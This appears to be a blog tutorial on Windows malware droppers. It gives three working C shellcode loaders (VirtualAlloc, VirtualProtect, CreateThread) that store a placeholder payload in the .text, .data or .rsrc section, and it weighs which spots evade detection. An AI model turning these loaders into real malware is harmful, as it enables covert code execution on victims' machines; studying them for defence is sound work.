Droppers and Payloads

C0deRed

  1. Droppers: A dropper is a type of malware that is used to install and execute malicious code (the payload) onto a target system. Droppers are designed to "drop" the payload onto the system and then trigger its execution. The dropper itself often does not perform the malicious activities; it's just the delivery vehicle.

  2. Payloads: A payload in this context refers to the part of the malware that performs the malicious action. This could be anything from stealing data, encrypting files for ransom, creating a backdoor, or any other malicious activity. The payload is what the attacker really cares about, while the dropper is just the means to get the payload onto the target system.

"Where to store your payload in the dropper?"

  • .text Section: This section typically contains the executable code of the program. Storing the payload here might be detectable because it can involve changing the flow of the program's legitimate code. However, it might also allow the payload to be executed more easily because this section is usually marked as executable.
    Example:
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(void) {
    
    void * exec_mem;
    BOOL rv;
    HANDLE th;
    DWORD oldprotect = 0;

    // 4 byte payload
    unsigned char payload[] = {
        0x90,		// NOP
        0x90,		// NOP
        0xcc,		// INT3
        0xc3		// RET
    };
    unsigned int payload_len = 4;
    
    // Allocate a memory buffer for payload
    exec_mem = VirtualAlloc(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    // Copy payload to new buffer
    RtlMoveMemory(exec_mem, payload, payload_len);
    
    // Make new buffer as executable
    rv = VirtualProtect(exec_mem, payload_len, PAGE_EXECUTE_READ, &oldprotect);

    getchar();

    // If all good, run the payload
    if ( rv != 0 ) {
            th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE) exec_mem, 0, 0, 0);
            WaitForSingleObject(th, -1);
    }

    return 0;
}
  • .data Section: This section contains initialized data, such as global variables. It could be a place to store the payload, but it's not usually marked as executable, which means extra steps would be needed to execute the payload.
    Example:

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

// 4 byte payload
unsigned char payload[] = {
    0x90,		// NOP
    0x90,		// NOP
    0xcc,		// INT3
    0xc3		// RET
};
unsigned int payload_len = 4;

int main(void) {
    
    void * exec_mem;
    BOOL rv;
    HANDLE th;
    DWORD oldprotect = 0;

    // Allocate a memory buffer for payload
    exec_mem = VirtualAlloc(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);


    // Copy payload to new buffer
    RtlMoveMemory(exec_mem, payload, payload_len);

    // Make new buffer as executable
    rv = VirtualProtect(exec_mem, payload_len, PAGE_EXECUTE_READ, &oldprotect);

    getchar();

    // If all good, run the payload
    if ( rv != 0 ) {
            th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE) exec_mem, 0, 0, 0);
            WaitForSingleObject(th, -1);
    }

    return 0;
}
  • .rsrc Section: This section contains resources, such as icons and menus. It's not typically executable and it's not usually where the program's code expects to find executable code, which could make it a more covert place to store a payload. However, it would also require extra steps to execute.
    Example:
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include "resources.h"

int main(void) {
    
    void * exec_mem;
    BOOL rv;
    HANDLE th;
    DWORD oldprotect = 0;
    HGLOBAL resHandle = NULL;
    HRSRC res;
    
    unsigned char * payload;
    unsigned int payload_len;
    
    // Extract payload from resources section
    res = FindResource(NULL, MAKEINTRESOURCE(FAVICON_ICO), RT_RCDATA);
    resHandle = LoadResource(NULL, res);
    payload = (char *) LockResource(resHandle);
    payload_len = SizeofResource(NULL, res);
    
    // Allocate some memory buffer for payload
    exec_mem = VirtualAlloc(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);


    // Copy payload to new memory buffer
    RtlMoveMemory(exec_mem, payload, payload_len);
    
    // Make the buffer executable
    rv = VirtualProtect(exec_mem, payload_len, PAGE_EXECUTE_READ, &oldprotect);

    getchar();

    // Launch the payload
    if ( rv != 0 ) {
            th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE) exec_mem, 0, 0, 0);
            WaitForSingleObject(th, -1);
    }

    return 0;
}
  • Adding a New Section: Another option is to add a new section to the PE file to store the payload. This provides more control and can help avoid disturbing the existing sections, but it can also be more detectable because it changes the structure of the PE file.

In practice, where to store the payload will depend on the specifics of the target system and the dropper's capabilities. Different methods may be more or less effective depending on factors such as the operating system, the presence of security software, and the privileges of the user or process that runs the dropper.

Related Posts

Leave a Reply

Your email address will not be published. Required fields are marked *